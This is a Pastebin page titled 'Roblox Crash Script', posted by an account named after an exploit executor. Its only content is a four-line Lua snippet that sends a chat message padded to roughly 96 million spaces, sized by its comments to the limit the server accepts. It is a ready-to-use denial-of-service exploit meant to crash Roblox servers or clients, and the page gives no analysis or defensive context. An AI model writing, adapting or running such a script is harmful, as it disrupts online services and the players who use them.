Advertisement
Roblox_ScripterKRNL

Roblox Crash Script

May 7th, 2022
13
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.17 KB | None | 0 0
  1. local v =96000000 --Maximal bit stream on client
  2. -- (96000000 - 12) -- Maximal bit stream that server accept +-2
  3. local msg = ""..string.rep(" ",(v - 12))
  4. game.Players:Chat(msg)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement